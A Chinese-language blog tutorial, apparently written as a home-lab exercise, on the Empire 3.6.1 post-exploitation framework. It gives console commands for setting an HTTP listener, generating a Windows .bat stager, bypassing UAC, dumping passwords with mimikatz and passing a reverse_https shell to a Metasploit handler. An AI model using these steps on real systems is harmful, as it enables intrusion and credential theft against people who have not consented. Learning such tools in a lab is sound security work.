empire3.6.1使用教程

empire使用
0
安装成功后在Empire文件夹中打开终端执行./empire
empire3.6.1使用教程1.设置监听

输入 listeners 命令进入监听模块,输入 uselistener 加空格然后两下 tab 可列出所有的可使用监听类,选http
empire3.6.1使用教程然后info就能查看监听的详细信息辣
empire3.6.1使用教程
最后设置好监听的Name(随便起)和Host(默认本机ip)和Port(80)
然后execute,就拿下了empire3.6.1使用教程
在listeners 模块下通过 list 命令可查看已经设置的监听。

2.生成木马

设置好监听后通过 back 命令返回上一级,然后使用 usestager 命令来指定生成木马的类型,通过空格加两下 tab 可查看所有生成文件的类型,这里我们使用 windows/launcher_bat,即 windows 平台下的 bat 文件,同样,通过 info 查看此模块的详细信息,最后执行execute

empire3.6.1使用教程(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener CFF
(Empire: stager/windows/launcher_bat) > execute

会出现这个
empire3.6.1使用教程去文件系统里找这个.bat文件,把拖到windows里()
双击,回到kali输入agents查看empire3.6.1使用教程help一下看看empire3.6.1使用教程

选择interact(交流; 沟通; 合作; 相互影响; 相互作用;) 和自己电脑的名字就可以进入shell,然后再help看看有什么模块
empire3.6.1使用教程输一个sysinfo玩玩

3.提权

如果想执行 windows 系统自带的命令,可以通过 shell 加命令的格式,例如查看当前 shell 的权限,我们输入 shell whoami /groups,返回了 medium 即非高权限
empire3.6.1使用教程
首先 empire 提供了很多使用模块,这里我们通过 usemodule 空格加两下 tab 可查看全部模块,有二百多个
bypassuac 提权我们使用 usemodule privesc/bypassuac 这个模块,然后 info 查看其信息
empire3.6.1使用教程empire3.6.1使用教程
继续设置参数Listener 我的是CFF,设置后通过 execute 执行,成功后会返回一个新的 shell,随后我们通过 agents 查看已有的 shell,username 前带 * 号的就是高权限已经提权成功的 shell。

empire3.6.1使用教程中途腾讯电脑管家有拦截好几次。。。。。。。全部允许后成功了
然后interact到那个带*的agents,用 mimikatz 来获取目标账号密码,要等一小会儿empire3.6.1使用教程
然后输入一个creds也能看empire3.6.1使用教程

4.反弹shell给msf

empire 若需要结合 msf 使用,则可以将得到的 shell 反给 msf,使用模块 code_execution/invoke_shellcode,输入usemodule code_execution/invoke_shellcode
empire3.6.1使用教程这里需要设置下 lhost 和 lport,lhost 即 msf 所在机器的 ip,lport 即 msf 监听反弹 shell 的端口,还有一个参数注意下,就是 exploit,默认值是 reverse_https,这个不用改,开另一个终端 输入msfconsole 进入msf,m输入 use exploit/multi/handler 我们 msf 设置监听时 payload 需要和其一致,也需要设置成 reverse_https,再设置msf的Lhost,Lport,Lhost 为本机所在的 ip,Lport 端口和刚才 empire 设置的一样,这里是 4444

empireempire3.6.1使用教程msf
empire3.6.1使用教程然后在msf exploit 执行监听,这时返回 empire 执行 execute,据说一会会看到 msf 已经收到了 shell,但我失败了
empire3.6.1使用教程如果没有报错可以返回msf,返回 shell 后,我们可以执行 whoami /groups 看下权限,可以看到返回的是高权限的 shell,如下图:

这是借鉴https://blog.****.net/fageweiketang/article/details/88020020

empire3.6.1使用教程

呜呜呜